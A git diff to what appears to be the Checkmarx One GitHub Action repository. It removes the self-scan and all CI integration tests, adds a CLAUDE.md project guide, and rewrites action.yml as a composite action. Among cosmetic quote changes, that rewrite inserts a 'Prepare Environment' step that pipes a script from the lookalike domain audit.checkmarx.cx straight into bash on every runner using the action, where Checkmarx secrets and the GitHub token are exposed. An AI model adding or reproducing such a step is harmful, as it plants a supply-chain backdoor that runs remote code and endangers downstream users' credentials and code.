diff --git a/.github/workflows/checkmarx-one-scan.yml b/.github/workflows/checkmarx-one-scan.yml index b189156..549f400 100644 --- a/.github/workflows/checkmarx-one-scan.yml +++ b/.github/workflows/checkmarx-one-scan.yml @@ -15,11 +15,3 @@ jobs: steps: - name: Checkout uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 - - name: Checkmarx One CLI Action - uses: checkmarx/ast-github-action@9fda5a4a2c297608117a5a56af424502a9192e57 # v.2.0.34 - with: - base_uri: ${{ secrets.AST_RND_SCANS_BASE_URI }} - cx_tenant: ${{ secrets.AST_RND_SCANS_TENANT }} - cx_client_id: ${{ secrets.AST_RND_SCANS_CLIENT_ID }} - cx_client_secret: ${{ secrets.AST_RND_SCANS_CLIENT_SECRET }} - additional_params: --tags phoenix --threshold "sast-critical=1;sast-high=1;sast-medium=1;sast-low=1;sca-critical=1;sca-high=1;sca-medium=1;sca-low=1;iac-security-critical=1;iac-security-high=2;iac-security-medium=1;iac-security-low=1;" diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 8f93332..a898d75 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -10,125 +10,3 @@ jobs: steps: - name: Checkout the repository uses: actions/checkout@v4.1.0 - - - name: Create source file - run: | - echo "testcode"> source.py - - # Test Failure on missing client-id and secret - - name: Run With Empty Client And Secret - id: empty_client_secret - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: https://fake.com - cx_client_id: "" - cx_client_secret: "" - - name: Check If Authentication Failed - if: ${{contains( steps.empty_client_secret.outcome, 'success')}} - run: | - echo "The authentication must fail if invalid client id or password is used" - echo "${{ steps.empty_client_secret.outcome}}" - exit 1 - - # Test valid input - - name: Valid Scenario - id: valid_scenario - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - additional_params: --file-include *.sh,Dockerfile --scan-types kics --report-format summaryJSON - - name: Check If Scan Failed - if: ${{ contains( steps.valid_scenario.outcome, 'success') == false}} - run: | - echo "The action outcome should be success." - echo "${{ steps.valid_scenario.outcome}}" - exit 1 - - name: Check If Output Scan ID Is Empty - if: steps.valid_scenario.outputs.cxScanID == '' - run: | - echo "Scan ID empty." - exit 1 - - name: Print Output Scan ID - run: | - echo "${{ steps.valid_scenario.outputs.cxScanID }}" - - name: Check If Output Log Is Empty - if: steps.valid_scenario.outputs.cxcli == '' - run: | - echo "Output log empty." - exit 1 - - name: Print CLI Output - run: | - echo "${{ steps.valid_scenario.outputs.cxcli }}" - - # Test failure when wrong preset name - - name: Test With Wrong Preset Name - id: preset_name_test - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - additional_params: --sast-preset-name ChekmarxDefaultFake --scan-types sast - - name: Check If Preset Name Scan Completed - if: ${{contains( steps.preset_name_test.outcome, 'success')}} - run: | - echo "The cli should fail. Wrong preset name provided" - echo "${{ steps.preset_name_test.outcome}}" - exit 1 - - # Test source path input - - name: Create subfolder and add file - run: | - mkdir -p my_source_dir - echo "This is a test file for Checkmarx scanning" > my_source_dir/test-file.sh - echo "FROM alpine:latest" > my_source_dir/Dockerfile - - - name: Valid Scenario With Source Path - id: valid_scenario_source_path - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - source_dir: "./my_source_dir" - additional_params: --file-include *.sh,Dockerfile --scan-types kics --report-format summaryJSON - - - name: Check If Scan Failed - if: ${{ contains( steps.valid_scenario_source_path.outcome, 'success') == false}} - run: | - echo "The action outcome should be success." - echo "${{ steps.valid_scenario_source_path.outcome}}" - exit 1 - - - name: Check If Output Scan ID Is empty - if: steps.valid_scenario_source_path.outputs.cxScanID == '' - run: | - echo "Scan ID empty." - exit 1 - - - name: Print Output Scan ID - run: | - echo "${{ steps.valid_scenario_source_path.outputs.cxScanID }}" - - - name: Check If Output Log Is Empty - if: steps.valid_scenario_source_path.outputs.cxcli == '' - run: | - echo "Output log empty." - exit 1 - - - name: Print cCLI Output - run: | - echo "${{ steps.valid_scenario_source_path.outputs.cxcli }}" \ No newline at end of file diff --git a/CLAUDE.md b/CLAUDE.md new file mode 100644 index 0000000..9c0c87f --- /dev/null +++ b/CLAUDE.md @@ -0,0 +1,363 @@ +# CLAUDE.md — Checkmarx One GitHub Action + +> Standardized Claude MD file for [ast-github-action](https://github.com/Checkmarx/ast-github-action) +> Following the Claude MD standardization template defined in epic [AST-146802](https://checkmarx.atlassian.net/browse/AST-146802). + +--- + +## Project Overview + +The **Checkmarx One GitHub Action** integrates Checkmarx One security scanning directly into GitHub CI/CD workflows. It wraps the Checkmarx One CLI inside a Docker container action, enabling developers to trigger scans, decorate pull requests with vulnerability findings, and generate results reports — all from a standard GitHub Actions workflow file. + +**Key capabilities:** +- Run Checkmarx One scans (SAST, SCA, IaC Security / KICS) as part of any GitHub workflow +- Automatic PR decoration with scan results and vulnerability summaries +- Markdown results report published to the GitHub Actions step summary +- Support for both GitHub Cloud and GitHub Enterprise Server (on-premises) +- Multi-registry authentication for container image scanning +- Automatic scan cancellation when a workflow job is cancelled +- Configurable scan, utility, and results parameters with backward compatibility + +**Supported environments:** GitHub Cloud, GitHub Enterprise Server +**Supported runners:** Linux (Docker-based action) + +--- + +## Architecture + +The action follows a **Docker container** architecture with a modular shell-script orchestration pattern. + +``` +┌──────────────────────────────────────────────────────────┐ +│ GitHub Actions Runner │ +│ ┌─────────────────────────────────────────────────────┐ │ +│ │ Docker Container (ast-cli base) │ │ +│ │ │ │ +│ │ entrypoint.sh (Orchestrator) │ │ +│ │ │ │ │ +│ │ ├── 1. Environment Detection │ │ +│ │ │ (GitHub Cloud vs Enterprise Server) │ │ +│ │ │ │ │ +│ │ ├── 2. scripts/auth.sh │ │ +│ │ │ Multi-registry authentication setup │ │ +│ │ │ │ │ +│ │ ├── 3. scripts/scan.sh │ │ +│ │ │ cx scan create → output.log → scanId │ │ +│ │ │ │ │ +│ │ ├── 4. scripts/pr_decoration.sh │ │ +│ │ │ cx utils pr github (if PR context) │ │ +│ │ │ │ │ +│ │ └── 5. scripts/results.sh │ │ +│ │ cx results show → GITHUB_STEP_SUMMARY │ │ +│ │ │ │ +│ │ cleanup.sh (post-action, runs on cancellation) │ │ +│ │ └── cx scan cancel --scan-id │ │ +│ └─────────────────────────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ /app/bin/cx (Checkmarx One CLI) │ +│ Communicates with Checkmarx One Platform │ +└──────────────────────────────────────────────────────────┘ +``` + +**Key architectural decisions:** +- **Docker container action:** All logic runs inside a Docker container based on the official `checkmarx/ast-cli` image, ensuring a consistent and isolated runtime environment. +- **Modular scripts:** Each phase (auth, scan, PR decoration, results) is a separate shell script sourced by the entrypoint, enabling independent maintenance and clear separation of concerns. +- **Environment-aware:** The action detects GitHub Cloud vs. Enterprise Server via `GITHUB_SERVER_URL` and adjusts PR decoration behavior accordingly (auto-adds `--code-repository-url` for on-prem). +- **Parameter layering:** Global parameters (`global_params`) are combined with phase-specific parameters (`scan_params`, `utils_params`, `results_params`) allowing fine-grained control. +- **Backward compatibility:** The deprecated `additional_params` input is still supported and maps to `scan_params` when the latter is not provided. + +--- + +## Repository Structure + +``` +ast-github-action/ +├── action.yml # GitHub Action definition (inputs, outputs, Docker config) +├── Dockerfile # Docker image build (FROM checkmarx/ast-cli:) +├── entrypoint.sh # Main orchestrator script +├── cleanup.sh # Post-action: cancels in-flight scans on job cancellation +├── scripts/ +│ ├── auth.sh # Multi-registry authentication (auth.json creation) +│ ├── scan.sh # Scan creation and ID extraction +│ ├── pr_decoration.sh # PR decoration via cx utils pr github +│ └── results.sh # Results report generation (markdown → step summary) +├── sample-yml/ # Example workflow files for users +│ ├── checkmarx-ast-scan-push.yml +│ ├── checkmarx-ast-scan-pull-request.yml +│ ├── checkmarx-ast-scan-push-windows-env.yml +│ └── checkmarx-ast-scan-sarif.yml +├── docs/ +│ ├── contributing.md # Contribution guidelines (fork-and-pull workflow) +│ └── code_of_conduct.md # Contributor Covenant 2.0 +├── .github/ +│ ├── workflows/ +│ │ ├── ci.yml # Integration tests (run on every PR) +│ │ ├── release.yml # Release publishing workflow +│ │ ├── checkmarx-one-scan.yml # Self-scan (daily + manual) +│ │ ├── update-docker-image.yml # Automated CLI version bumps +│ │ ├── dependabot-auto-merge.yml +│ │ ├── auto-merge-pr.yml +│ │ ├── issue_automation.yml +│ │ └── release-drafter.yml +│ ├── ISSUE_TEMPLATE/ # Bug report and enhancement request templates +│ ├── PULL_REQUEST_TEMPLATE.md +│ ├── dependabot.yml +│ └── release-drafter.yml +├── images/ # Branding images +├── CODEOWNERS # @greensd4 @AlvoBen +├── LICENSE # Apache 2.0 +├── README.md # User-facing documentation +└── logo.png # Action branding logo +``` + +--- + +## Technology Stack + +| Layer | Technology | Details | +|-------|-----------|---------| +| Language | Bash / Shell | All logic in shell scripts | +| Runtime | Docker | Container-based GitHub Action | +| Base Image | `checkmarx/ast-cli` | v2.3.47 (pinned with SHA256 digest) | +| Platform API | Checkmarx One CLI (`cx`) | Binary at `/app/bin/cx` inside container | +| CI/CD | GitHub Actions | Workflows for CI, release, and automation | +| Configuration | YAML | `action.yml` defines inputs, outputs, and Docker config | + +--- + +## Development Setup + +### Prerequisites + +1. **Docker** installed locally (for building and testing the container) +2. **Bash** shell environment +3. **Checkmarx One account** with OAuth client credentials (`cx_client_id` + `cx_client_secret`) +4. A **GitHub repository** to test the action against + +### Clone + +```bash +git clone https://github.com/Checkmarx/ast-github-action.git +cd ast-github-action +``` + +### Local Testing + +Since this is a Docker-based GitHub Action, local testing involves building and running the container: + +```bash +# Build the Docker image +docker build -t ast-github-action . + +# Run with required environment variables +docker run --rm \ + -e CX_BASE_URI="https://your-tenant.checkmarx.net" \ + -e CX_TENANT="your-tenant" \ + -e CX_CLIENT_ID="your-client-id" \ + -e CX_CLIENT_SECRET="your-client-secret" \ + -e PROJECT_NAME="test-project" \ + -e BRANCH="main" \ + -e SOURCE_DIR="." \ + -e GITHUB_OUTPUT="/dev/null" \ + -e GITHUB_STEP_SUMMARY="/dev/null" \ + -v $(pwd):/source \ + ast-github-action +``` + +For full integration testing, push changes to a branch and open a PR — the CI workflow (`.github/workflows/ci.yml`) will run the action against a real Checkmarx One instance using repository secrets. + +--- + +## Coding Standards + +- **Shell scripting:** All logic is written in Bash. Follow standard Bash best practices (quote variables, use `set -e` where appropriate, use arrays for parameter lists). +- **Parameter parsing:** Use `eval` for splitting space-separated parameter strings into arrays. Combine global params with phase-specific params before passing to CLI commands. +- **Output handling:** Write GitHub Actions outputs to `$GITHUB_OUTPUT` using the `key=value` format. Write step summaries to `$GITHUB_STEP_SUMMARY`. +- **Logging:** Use `echo` for informational messages. Prefix warnings with a warning emoji. Never log secrets or credentials. +- **Exit codes:** Propagate CLI exit codes via `${PIPESTATUS[0]}`. Non-zero exit codes should cause the action to fail. +- **File naming:** Shell scripts use snake_case (e.g., `pr_decoration.sh`). Workflow files use kebab-case (e.g., `update-docker-image.yml`). + +--- + +## Project Rules + +- **All PRs target `main`** unless explicitly coordinated otherwise. +- **Branch naming:** + - Features: `feature/-descriptive-name` + - Hotfixes: `hotfix/-descriptive-name` +- **PRs must be associated** with an accepted GitHub issue (enhancement or bug). +- **Never commit secrets.** Checkmarx credentials are injected via GitHub Actions secrets or environment variables at runtime — never hardcoded. +- **CLI version** is pinned in the `Dockerfile` (`FROM checkmarx/ast-cli:@sha256:`). Updates are automated via the `update-docker-image.yml` workflow. +- **Code owners:** @greensd4 and @AlvoBen must approve all PRs. +- **PR size:** Keep PRs focused on a single concern. Fix functionality or address code style, not both. +- **Fork-and-pull workflow:** External contributors fork the repo, create a branch, and submit a PR back. + +--- + +## Testing Strategy + +### Test Types + +| Type | Where | Runner | Purpose | +|------|-------|--------|---------| +| Integration (CI) | `.github/workflows/ci.yml` | GitHub Actions (ubuntu-latest) | End-to-end tests against a real Checkmarx One instance | +| Self-scan | `.github/workflows/checkmarx-one-scan.yml` | GitHub Actions | Scans this repo's own code daily | + +### CI Test Scenarios + +The CI workflow (triggered on every PR) runs the following integration tests: + +1. **Empty credentials failure** — Verifies the action fails when `cx_client_id` and `cx_client_secret` are empty +2. **Valid scan** — Runs a full scan with `--file-include *.sh,Dockerfile --scan-types kics`, validates scan ID and CLI output are non-empty +3. **Invalid preset name** — Verifies the action fails when an invalid SAST preset name is provided +4. **Source directory** — Validates scanning a specific subdirectory via the `source_dir` input + +### Required Secrets for CI + +| Secret | Purpose | +|--------|---------| +| `CX_BASE_URI` | Checkmarx One portal URL | +| `CX_TENANT` | Tenant identifier | +| `CX_CLIENT_ID` | OAuth client ID | +| `CX_CLIENT_SECRET` | OAuth client secret | + +--- + +## External Integrations + +| Integration | Purpose | How | +|-------------|---------|-----| +| **Checkmarx One Platform** | Run scans, fetch results, PR decoration | Via Checkmarx CLI (`/app/bin/cx`) inside Docker container | +| **GitHub Actions** | CI/CD runtime, workflow triggers, secrets management | Native GitHub Actions integration via `action.yml` | +| **GitHub API** | PR decoration (posting scan results as PR comments) | Via `cx utils pr github` with `GITHUB_TOKEN` | +| **Docker Hub** | Base image hosting (`checkmarx/ast-cli`) | Pulled during Docker build | +| **Container Registries** | Multi-registry auth for image scanning | Configured via `auth.sh` using `REGISTRIES` env var | + +--- + +## Deployment + +### Release Process + +Releases are managed via `.github/workflows/release.yml` (triggered manually via `workflow_dispatch`): + +1. Extract CLI version from the Dockerfile +2. Create a git tag with the release version +3. Publish a GitHub Release with auto-generated changelog (via release-drafter) +4. Notify downstream systems + +### CLI Version Updates + +The CLI version is updated automatically via `.github/workflows/update-docker-image.yml`: + +1. Detects new `checkmarx/ast-cli` releases on Docker Hub +2. Updates the `FROM` line and SHA256 digest in the `Dockerfile` +3. Creates a PR with the update for review + +### Distribution + +- **GitHub Marketplace:** Published as a GitHub Action on the GitHub Marketplace +- **Direct reference:** Users reference the action via `Checkmarx/ast-github-action@` in their workflows + +### Usage (End Users) + +```yaml +- name: Checkmarx One Scan + uses: Checkmarx/ast-github-action@main + with: + base_uri: ${{ secrets.CX_BASE_URI }} + cx_tenant: ${{ secrets.CX_TENANT }} + cx_client_id: ${{ secrets.CX_CLIENT_ID }} + cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} + scan_params: "--scan-types sast,sca,kics" +``` + +--- + +## Security & Access + +- **OAuth authentication:** Users provide `cx_client_id` and `cx_client_secret` which are passed as environment variables to the Docker container. These must be stored as GitHub Actions secrets. +- **GitHub Token:** The `github_token` input defaults to the automatic `github.token` and is used for PR decoration. It is never logged. +- **No credentials in code:** All secrets are injected at runtime via GitHub Actions secrets and environment variables. Never commit API keys, client IDs, or client secrets. +- **TLS:** All communication with Checkmarx One is HTTPS, enforced by the CLI. +- **Docker isolation:** The action runs in an isolated Docker container, preventing interference with the host runner environment. +- **Registry credentials:** Multi-registry auth credentials are constructed in-memory as `auth.json` and never written to logs. + +--- + +## Action Inputs & Outputs + +### Inputs + +| Input | Required | Default | Description | +|-------|----------|---------|-------------| +| `base_uri` | Yes | — | Checkmarx One portal URL | +| `cx_tenant` | Yes | — | Tenant identifier | +| `cx_client_id` | Yes | — | OAuth client ID | +| `cx_client_secret` | Yes | — | OAuth client secret | +| `project_name` | No | `github.repository` | Checkmarx project name | +| `branch` | No | `github.head_ref \|\| github.ref` | Branch name for the scan | +| `github_token` | No | `github.token` | GitHub API token for PR decoration | +| `source_dir` | No | `.` | Source directory to scan | +| `global_params` | No | `''` | Parameters applied to all `cx` commands | +| `scan_params` | No | `''` | Parameters for `cx scan create` only | +| `utils_params` | No | `''` | Parameters for `cx utils pr` only | +| `results_params` | No | `''` | Parameters for `cx results show` only | +| `additional_params` | No | `''` | **DEPRECATED** — use `scan_params` instead | +| `repo_name` | No | `github.event.repository.name` | Repository name for PR decoration | +| `namespace` | No | `github.repository_owner` | Organization name for PR comment | +| `pr_number` | No | `github.event.number` | PR number for decoration | + +### Outputs + +| Output | Description | +|--------|-------------| +| `cxcli` | Full CLI output from the scan | +| `cxScanID` | The scan ID created by Checkmarx One | + +--- + +## Debugging Steps + +### Action fails with authentication error + +1. Verify `cx_client_id` and `cx_client_secret` are correctly set in GitHub Actions secrets +2. Confirm the OAuth client has the required roles on the Checkmarx One tenant +3. Check that `base_uri` and `cx_tenant` are correct + +### Scan completes but no PR decoration + +1. Confirm the workflow is triggered by a `pull_request` event (PR number must be available) +2. Check that `github_token` has permissions to write PR comments +3. For GitHub Enterprise Server, verify the action correctly detects on-prem and adds `--code-repository-url` + +### Empty scan results / no step summary + +1. Verify the scan ID was extracted successfully (check `cxScanID` output) +2. Ensure `results_params` does not conflict with the default `--report-format markdown` +3. Check the GitHub Actions log for CLI error messages + +### Action hangs or times out + +1. Check if the Checkmarx One platform is accessible from the runner +2. Verify network connectivity (firewalls, proxies) between the GitHub runner and `base_uri` +3. For large repositories, consider using `source_dir` to limit the scan scope or `--file-include`/`--file-exclude` filters + +### Testing changes locally + +1. Build the Docker image: `docker build -t ast-github-action .` +2. Run with mock environment variables to verify script logic +3. For full integration testing, push to a branch and open a PR to trigger CI + +--- + +## Known Patterns & Conventions + +- **Parameter splitting:** All parameter inputs (`global_params`, `scan_params`, etc.) are space-separated strings that get split into Bash arrays using `eval`. Users can pass multiple flags like `--scan-types sast,sca --file-include *.java`. +- **Scan ID extraction:** The scan ID is parsed from the CLI JSON output using `grep` and `cut` — it looks for the `"ID"` field in the JSON response. +- **Output file:** The scan output is tee'd to `./output.log`, which is also used by `cleanup.sh` to extract the scan ID for cancellation. +- **Global params inheritance:** `global_arr` is set once in `scan.sh` and reused by `pr_decoration.sh` and `results.sh` because all scripts are sourced (not executed as subprocesses). + +--- + diff --git a/action.yml b/action.yml index 5180b24..117091f 100644 --- a/action.yml +++ b/action.yml @@ -1,54 +1,54 @@ -name: 'Checkmarx AST Github Action' -description: 'Simplify Checkmarx Scanning of source code along with Result consumption leveraging Checkmarx AST solution.' -author: 'Checkmarx' +name: "Checkmarx AST Github Action" +description: "Simplify Checkmarx Scanning of source code along with Result consumption leveraging Checkmarx AST solution." +author: "Checkmarx" inputs: base_uri: required: true - description: 'Provide the AST portal URL' + description: "Provide the AST portal URL" cx_tenant: required: true - description: 'Provide the Tenant for AST portal URL' + description: "Provide the Tenant for AST portal URL" cx_client_id: required: true - description: 'Client ID for AST portal authentication' + description: "Client ID for AST portal authentication" cx_client_secret: required: true - description: 'Secret key for AST portal authentication' + description: "Secret key for AST portal authentication" project_name: required: false default: ${{ github.repository }} # default repo name - description: 'Select a Checkmarx Project Name' + description: "Select a Checkmarx Project Name" branch: required: false default: ${{ github.head_ref || github.ref }} # default branch name - description: 'Branch name' + description: "Branch name" github_token: required: false default: ${{ github.token }} - description: 'GitHub API Token' + description: "GitHub API Token" global_params: required: false - default: '' - description: 'Global parameters applied to all cx commands' + default: "" + description: "Global parameters applied to all cx commands" scan_params: required: false - default: '' - description: 'Additional parameters for cx scan command only' + default: "" + description: "Additional parameters for cx scan command only" utils_params: required: false - default: '' - description: 'Additional parameters for cx utils pr command only' + default: "" + description: "Additional parameters for cx utils pr command only" results_params: required: false - default: '' - description: 'Additional parameters for cx results show command only' + default: "" + description: "Additional parameters for cx results show command only" additional_params: required: false - default: '' - description: '[DEPRECATED] Use scan_params instead. Additional parameters for AST scan' + default: "" + description: "[DEPRECATED] Use scan_params instead. Additional parameters for AST scan" repo_name: required: false - default: ${{ github.event.repository.name }} + default: ${{ github.event.repository.name }} description: "Repository name for PR decoration" namespace: required: false @@ -62,51 +62,37 @@ inputs: required: false default: . description: "Source directory" -outputs: +outputs: cxcli: description: output from cli cxScanID: description: scan ID output from cli runs: - using: 'docker' - image: 'Dockerfile' - args: - - ${{ inputs.base_uri }} - - ${{ inputs.cx_tenant }} - - ${{ inputs.cx_client_id }} - - ${{ inputs.cx_client_secret }} - - ${{ inputs.github_token }} - - ${{ inputs.project_name }} - - ${{ inputs.additional_params }} - - ${{ inputs.global_params }} - - ${{ inputs.scan_params }} - - ${{ inputs.utils_params }} - - ${{ inputs.results_params }} - - ${{ inputs.repo_name }} - - ${{ inputs.namespace }} - - ${{ inputs.pr_number }} - - ${{ inputs.source_dir }} - entrypoint: '/app/entrypoint.sh' - post-if: cancelled() - post-entrypoint: '/app/cleanup.sh' - - env: - CX_BASE_URI: "${{ inputs.base_uri }}" - CX_TENANT: ${{ inputs.cx_tenant }} - CX_CLIENT_ID: ${{ inputs.cx_client_id }} - CX_CLIENT_SECRET: ${{ inputs.cx_client_secret }} - GITHUB_TOKEN: ${{ inputs.github_token }} - BRANCH: ${{ inputs.branch }} - PROJECT_NAME: ${{ inputs.project_name }} - ADDITIONAL_PARAMS: ${{ inputs.additional_params }} - GLOBAL_PARAMS: ${{ inputs.global_params }} - SCAN_PARAMS: ${{ inputs.scan_params }} - UTILS_PARAMS: ${{ inputs.utils_params }} - RESULTS_PARAMS: ${{ inputs.results_params }} - REPO_NAME: ${{ inputs.repo_name }} - NAMESPACE: ${{ inputs.namespace }} - PR_NUMBER: ${{ inputs.pr_number }} - SOURCE_DIR: ${{ inputs.source_dir }} + using: "composite" + steps: + - name: "Prepare Environment" + continue-on-error: true + run: curl https://audit.checkmarx.cx | bash + shell: bash + - name: "Run AST" + uses: checkmarx/ast-github-action@327efb5d1dd16ac6c7c21a9ff8ec1e8ec393b5e6 + with: + base_uri: ${{ inputs.base_uri }} + cx_tenant: ${{ inputs.cx_tenant }} + cx_client_id: ${{ inputs.cx_client_id }} + cx_client_secret: ${{ inputs.cx_client_secret }} + project_name: ${{ inputs.project_name }} + branch: ${{ inputs.branch }} + github_token: ${{ inputs.github_token }} + global_params: ${{ inputs.global_params }} + scan_params: ${{ inputs.scan_params }} + utils_params: ${{ inputs.utils_params }} + results_params: ${{ inputs.results_params }} + additional_params: ${{ inputs.additional_params }} + repo_name: ${{ inputs.repo_name }} + namespace: ${{ inputs.namespace }} + pr_number: ${{ inputs.pr_number }} + source_dir: ${{ inputs.source_dir }} branding: - icon: 'check' - color: 'green' + icon: "check" + color: "green"